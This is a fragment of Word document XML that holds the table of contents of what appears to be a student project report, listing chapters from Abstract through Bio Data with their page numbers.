                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D1225D7" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="196"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Page</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C42674D" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="161" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="256"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>No.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A778D5" w14:paraId="262E7692" w14:textId="77777777">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="46" w:type="dxa"/>
          <w:trHeight w:val="433"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1094" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09C9653B" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7080" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="0E3D3F82" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="103"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Abstract</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EBA251B" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="369"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A778D5" w14:paraId="306C3991" w14:textId="77777777">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="46" w:type="dxa"/>
          <w:trHeight w:val="436"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1094" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F8778E2" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7080" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="6B3558A1" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="103"/>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885" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78961338" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="369"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A778D5" w14:paraId="5F25B7A3" w14:textId="77777777">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="46" w:type="dxa"/>
          <w:trHeight w:val="433"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1094" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42E92AA5" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7080" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="0615D3E9" w14:textId="44DCC4BA" w:rsidR="00A778D5" w:rsidRDefault="001E0F80">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="103"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>CHAPTER 1: Introduction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E6F4E91" w14:textId="1FDCD1CB" w:rsidR="00A778D5" w:rsidRDefault="00927343">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="369"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E0F80" w14:paraId="2E2B8BBC" w14:textId="77777777" w:rsidTr="001E0F80">
        <w:trPr>
          <w:trHeight w:val="498"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1094" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4502D370" w14:textId="1CB68370" w:rsidR="001E0F80" w:rsidRDefault="001E0F80" w:rsidP="001E0F80">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7018" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C853681" w14:textId="61CFA470" w:rsidR="001E0F80" w:rsidRDefault="001E0F80">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="104"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Litereture Survey</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="6D88A4EA" w14:textId="71714F20" w:rsidR="001E0F80" w:rsidRDefault="00927343">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="369"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A778D5" w14:paraId="23C96434" w14:textId="77777777">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="46" w:type="dxa"/>
          <w:trHeight w:val="436"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1094" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="523718E9" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7080" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="26C37B23" w14:textId="67CE08BB" w:rsidR="00A778D5" w:rsidRDefault="001E0F80">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="103"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Theoretical Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3457B50C" w14:textId="37E52822" w:rsidR="00A778D5" w:rsidRDefault="00927343">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="369"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A778D5" w14:paraId="51667F34" w14:textId="77777777">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="46" w:type="dxa"/>
          <w:trHeight w:val="433"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1094" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1293DAC8" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7080" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="4D3CF44F" w14:textId="13FF12A2" w:rsidR="00A778D5" w:rsidRDefault="001E0F80">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="103"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Experimental Investigations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="367569BE" w14:textId="6A1CBBB3" w:rsidR="00A778D5" w:rsidRDefault="00927343">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="369"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A778D5" w14:paraId="7AE88748" w14:textId="77777777">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="46" w:type="dxa"/>
          <w:trHeight w:val="436"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1094" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="642ADE48" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7080" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="5B9E5BAD" w14:textId="4FB0205C" w:rsidR="00A778D5" w:rsidRDefault="001E0F80">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="103"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Flowchart</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="652FEEC9" w14:textId="69FF2B53" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="309"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00927343">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A778D5" w14:paraId="57039699" w14:textId="77777777">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="46" w:type="dxa"/>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1094" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="459AD56F" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7080" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="5FFADBF6" w14:textId="1BDFC78F" w:rsidR="00A778D5" w:rsidRDefault="001E0F80">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="103"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Results</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35D56800" w14:textId="679A8F90" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="309"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00927343">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A778D5" w14:paraId="0C8ABEE1" w14:textId="77777777">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="46" w:type="dxa"/>
          <w:trHeight w:val="433"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1094" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FB55A2D" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7080" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="2B514E16" w14:textId="36328F81" w:rsidR="00A778D5" w:rsidRDefault="001E0F80">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="103"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Advantages and Disadvantages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="692D5E62" w14:textId="08903388" w:rsidR="00A778D5" w:rsidRDefault="00927343" w:rsidP="00927343">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="309"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A778D5" w14:paraId="3E314EF7" w14:textId="77777777">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="46" w:type="dxa"/>
          <w:trHeight w:val="436"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1094" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41C97915" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7080" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="6936EF12" w14:textId="5C4D8AE4" w:rsidR="00A778D5" w:rsidRDefault="001E0F80">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="103"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B7E7A93" w14:textId="7E3307AD" w:rsidR="00A778D5" w:rsidRDefault="00927343">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="309"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E0F80" w14:paraId="1687A42C" w14:textId="77777777">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="46" w:type="dxa"/>
          <w:trHeight w:val="436"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1094" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F5A15CE" w14:textId="2587C5BB" w:rsidR="001E0F80" w:rsidRDefault="001E0F80">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7080" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="1E036D3C" w14:textId="4858E2F9" w:rsidR="001E0F80" w:rsidRDefault="001E0F80">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="103"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Conclusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="048251C5" w14:textId="3851F6DA" w:rsidR="001E0F80" w:rsidRDefault="00927343">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="309"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E0F80" w14:paraId="420C4274" w14:textId="77777777">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="46" w:type="dxa"/>
          <w:trHeight w:val="436"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1094" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CB1E8E6" w14:textId="15084C9E" w:rsidR="001E0F80" w:rsidRDefault="001E0F80">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7080" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="0040B340" w14:textId="3CFF9753" w:rsidR="001E0F80" w:rsidRDefault="001E0F80">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="103"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Future Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D293CBF" w14:textId="43202B7F" w:rsidR="001E0F80" w:rsidRDefault="00927343">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="309"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E0F80" w14:paraId="34702F54" w14:textId="77777777">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="46" w:type="dxa"/>
          <w:trHeight w:val="436"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1094" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B5E46E9" w14:textId="72728C30" w:rsidR="001E0F80" w:rsidRDefault="001E0F80">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7080" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="1AD352A1" w14:textId="076DF2C5" w:rsidR="001E0F80" w:rsidRDefault="00927343">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="103"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3815B93D" w14:textId="3BD1759C" w:rsidR="001E0F80" w:rsidRDefault="00927343">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="309"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E0F80" w14:paraId="2FA9B89E" w14:textId="77777777">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="46" w:type="dxa"/>
          <w:trHeight w:val="436"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1094" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4ED47F02" w14:textId="4B514042" w:rsidR="001E0F80" w:rsidRDefault="00927343">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7080" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="4919533B" w14:textId="3E5D5864" w:rsidR="001E0F80" w:rsidRDefault="00927343">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="103"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Bio Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B9AE0AA" w14:textId="3F7BCE16" w:rsidR="001E0F80" w:rsidRDefault="00927343">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="309"/>
              <w:jc w:val="right"/>
              <w:rPr>
